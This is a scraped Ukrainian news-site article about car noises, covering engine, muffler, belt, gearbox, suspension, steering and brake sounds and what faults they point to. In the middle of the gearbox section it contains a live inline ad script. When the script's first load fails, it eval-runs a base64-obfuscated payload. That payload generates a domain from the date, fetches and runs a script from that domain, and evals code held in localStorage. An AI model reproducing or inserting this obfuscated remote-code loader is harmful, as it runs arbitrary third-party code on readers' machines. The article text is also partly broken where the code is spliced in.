Які звуки видає автомобіль і коли час хвилюватися

Будь-який водій звикає до шуму під час руху автомобіля і не помічає його, поки все працює нормально. Як тільки у звичний фон вклинюються щось нове, це відразу викликає настороженість. Автовласники зі стажем по одному звуку можуть визначити несправність, а тим, хто поки що не обізнаний, доводиться вирушати на СТО. Хоча перед візитом не завадить дізнатися, звідки саме виходять звуки, і зайти на Avto.pro, щоб спланувати витрати.

Визначаємо на слух місце поломки

Деякі місця викликають велике занепокоєння, а на інші хочеться махнути рукою. Але навіть дрібна поломка може спричинити великі неприємності та нашкодити сусіднім, не пов’язаним із нею безпосередньо, агрегатам.

Двигун

Найбільше лякає двигун, що незвичайно звучить. Як правило, ненормальні звуки звідти видаються на високих швидкостях, а при уповільненні можуть пропадати, і двигун веде себе нормально. Однак ігнорувати сигнали не можна — невчасний ремонт може дуже боляче вдарити по кишені. Можливі причини: знос підшипників ГРМ, розбита постіль розподільного валу/

Глушник

Відокремити сторонні шуми в глушнику від звуків двигуна буває непросто, для цього треба прослухати автомобіль по всій довжині. Якщо глушник звучить ненормально, це можуть пояснити нещільності на стиках труб. Шум може видавати отвір у «банці» або навіть штатний отвір труби під заднім бампером. Останнє відбувається, коли начинка одного з глушників вигоряє. Нічого з перерахованого не смертельно, але може завдати неприємностей у вигляді вихлопу, що розвалився, прямо посеред дороги.

Навісне обладнання

Характерний шум гучного писку вказує на насоси ГУР чи кондиціонера, чи навіть ремені генератора. Мабуть, щось із цього зносилося і ось-ось розвалиться. Якщо замість писку ви чуєте гул або дзижчання, залежне від оборотів мотора, потрібно замінити привід кондиціонера.

Коробка передач

КПП будь-якого типу видає величезну палітру звуків, іноді навіть без руху. Найчастішим їх джерелом є підшипники та шестерні, які зносилися. Характер звуку — гудіння, яке зникає або зменшується при натисканні педалі зчеплення. Іноді «винний» може бути низький рівень масла в коробці. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Ходова частина

Шарніри – хворе місце будь-якої підвіски. Якщо в передній частині авто чути хрускіт і клацання під час поворотів або на початку руху, це може вказувати на поламані ШРУСи. Їх треба терміново замінити, щоби не сталася аварія. Також може рипіти пружина підвіски під час розгойдування авто, якщо її гумові проставки зруйновані. А дивне пружне клацання з-під капота при обертанні керма говорить про пошкодження опорних підшипників на передніх стійках.

Рульовий механізм

Зношені шарніри систем управління гримітимуть при проїзді нерівностей. Міняти їх треба терміново, інакше їзда стане небезпечною. Стукати можуть також рейки та ослаблені різьбові кріплення. Кріплення треба підтягнути, рейка швидше за все підлягає заміні.

Гальма

Писк при гальмуванні — ознака зношених чи погано підібраних колодок. У будь-якому разі їх треба міняти. Крім писку, гальмівні механізми можуть стукати по нерівній дорозі. Це знову ж таки свідчить про проблему з колодками.

Звуки можуть дати повне уявлення про роботу автомобіля. Якщо у вашому салоні завжди звучить музика чи кричать діти, варто завести корисну звичку проїжджати хоча б пару кілометрів на день на самоті та тиші, щоб не пропустити важливих сигналів та вчасно вирішити проблему. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/yaki-zvuki-vidaye-avtomobil-i-koli-chas-hvilyuvatisya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top